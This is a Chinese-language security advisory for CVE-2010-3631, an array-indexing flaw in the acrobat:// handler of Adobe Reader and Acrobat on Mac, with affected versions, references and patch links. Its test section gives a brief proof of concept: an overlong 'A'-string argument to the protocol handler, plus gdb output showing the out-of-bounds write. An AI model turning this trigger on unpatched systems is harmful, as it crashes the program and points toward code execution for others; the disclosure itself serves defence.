发布日期：2010-10-05
更新日期：2010-10-08

受影响系统：

Adobe Acrobat 9.x
Adobe Acrobat 8.x
Adobe Reader 9.x
Adobe Reader 8.x

不受影响系统：

Adobe Acrobat 9.4
Adobe Acrobat 8.2.5
Adobe Reader 9.4
Adobe Reader 8.2.5

描述：

---

BUGTRAQ  ID: 43733
CVE ID: CVE-2010-3631

Adobe Reader和Acrobat都是非常流行的PDF文件阅读器。

Macintosh版本的Adobe Reader和Acrobat在解析acrobat://协议处理器参数时存在数组索引错误，超长参数可能导致向缓冲区界外写入空字节并执行任意代码。

<*来源：knud
  
  链接：http://secunia.com/advisories/41435
        http://marc.info/?l=full-disclosure&m=128636804421708&q=p5
        http://www.us-cert.gov/cas/techalerts/TA10-279A.html
        https://www.redhat.com/support/errata/RHSA-2010-0743.html
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

terminal 1:
       $ gdb --waitfor=AdobeReader

       terminal 2:
       $ open acrobat://`perl -e 'print "A" x 12000'`

       terminal 1:
       (gdb) cont
       [snip]
       Program received signal EXC_BAD_ACCESS, Could not access memory.
       Reason: KERN_INVALID_ADDRESS at address: 0xc00013d2
       0x7ffa0d6a in AcroBundleThreadQuitProc ()
       (gdb) set disassembly-flavor intel
       (gdb) x/i $pc
       0x7ffa0d6a <AcroBundleThreadQuitProc+2608>:     mov    BYTE PTR
       [ebp+eax-0x420],0x0
       (gdb) i r ebp eax
       ebp            0xbfffe908       0xbfffe908
       eax            0x2eea   12010
       (gdb)

建议：

---

厂商补丁：

Adobe
-----
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://www.adobe.com/support/security/advisories/apsa10-03.html

RedHat
------
RedHat已经为此发布了一个安全公告（RHSA-2010:0743-01）以及相应补丁:
RHSA-2010:0743-01：Critical: acroread security update
链接：https://www.redhat.com/support/errata/RHSA-2010-0743.html

浏览次数：2890
严重程度：0（网友投票）